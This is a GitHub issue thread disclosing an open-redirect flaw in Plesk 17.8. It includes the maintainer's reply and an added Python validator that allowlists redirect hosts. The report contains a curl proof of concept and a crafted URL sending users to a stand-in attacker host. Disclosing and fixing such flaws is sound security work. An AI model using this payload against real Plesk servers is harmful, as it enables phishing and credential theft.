plesk/docker

Security issue - Open redirect on plesk version 17.8

Closed this issue · 2 comments

Hi, I've disclosed a vulnerability about open redirect on Plesk version 17.8 and previous versions.
Whenever a user accesses the URL https://trusted-plesk-url.com:8443/enterprise/rsession_init.php?failure_redirect_url=https://attacker.com, they would be redirected to the URL https://attacker.com.
POC:

$ curl -I https://trusted-plesk-url.com:8443/enterprise/rsession_init.php?failure_redirect_url=https://attacker.com --insecure 
HTTP/1.1 303 See Other
Server: sw-cp-server
Date: Sun, 30 Sep 2018 04:50:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Fri, 28 May 1999 00:00:00 GMT
Last-Modified: Sun, 30 Sep 2018 04:50:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; secure; HttpOnly
Location: https://attacker.com

This issue is warned about in your documentation. But, by default, this feature isn't configured, and web applications and users could be affected.

Effect:
This issue can lead to phishing attacks: attackers can modify a trusted URL so that it points to malicious sites, and they may successfully launch a phishing scam and steal user credentials.

Recommendation:
This feature MUST be configured following the documentation. This is a COMPULSORY step that would enhance security for web applications and users.

P.S.: sorry for my bad English.

Hello,
Thank you for the report!

I agree that the default value of the security.trustedRedirectHosts setting should be secure. This security improvement in Plesk is registered as PFSI-61220.

However, this issue is not related to Dockerfiles for Plesk, so it should be closed.

Closed. Please visit https://talk.plesk.com for direct support by the Plesk team.
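As an added illustration of the allowlist the reporter recommends and the fail-closed `security.trustedRedirectHosts` default the maintainer agrees should apply, here is a redirect-target validator that rejects the open-redirect pattern shown in the PoC. This is example code written for this page, not Plesk's implementation; the hostnames, `SAFE_FALLBACK` and the function name are assumptions.

```python
from urllib.parse import urlsplit

# Constructed stand-in for the Plesk "security.trustedRedirectHosts" allowlist
# (hypothetical hostnames; a real deployment lists its own panel hostnames).
TRUSTED_REDIRECT_HOSTS = {"trusted-plesk-url.com", "panel.example.com"}
# Hypothetical same-site landing page used whenever the candidate is rejected.
SAFE_FALLBACK = "/login_up.php"


def safe_redirect_target(candidate, trusted_hosts=TRUSTED_REDIRECT_HOSTS,
                         fallback=SAFE_FALLBACK):
    """Return `candidate` if it is a same-site path or an http(s) URL whose
    host is on the allowlist; otherwise return `fallback`.

    An empty `trusted_hosts` means every absolute URL is rejected, which is
    the fail-closed default the report asks for.
    """
    if not candidate or any(ord(ch) <= 0x20 for ch in candidate):
        return fallback  # empty, or whitespace/control chars that parsers mangle
    if candidate.startswith("/"):
        # "/path" stays on this host, but browsers read "//host" and
        # "/\host" as scheme-relative URLs that leave the site.
        return fallback if candidate[1:2] in ("/", "\\") else candidate
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return fallback  # e.g. malformed IPv6 literal
    if parts.scheme.lower() not in ("http", "https"):
        return fallback  # javascript:, data:, and bare "path" without a scheme
    # .hostname drops userinfo and port, so "trusted@attacker.com" and
    # "attacker.com:443" are compared on their real host part.
    host = (parts.hostname or "").rstrip(".").lower()
    if host not in {h.lower() for h in trusted_hosts}:
        return fallback  # also catches "trusted-plesk-url.com.attacker.com"
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs, including the PoC value from the report.
    for url in ("https://attacker.com",
                "https://trusted-plesk-url.com:8443/login",
                "//attacker.com",
                "https://trusted-plesk-url.com@attacker.com/"):
        print(f"{url!r:50} -> {safe_redirect_target(url)}")
```

Exact host matching is deliberate: suffix or substring checks would still accept lookalike hosts such as `trusted-plesk-url.com.attacker.com`.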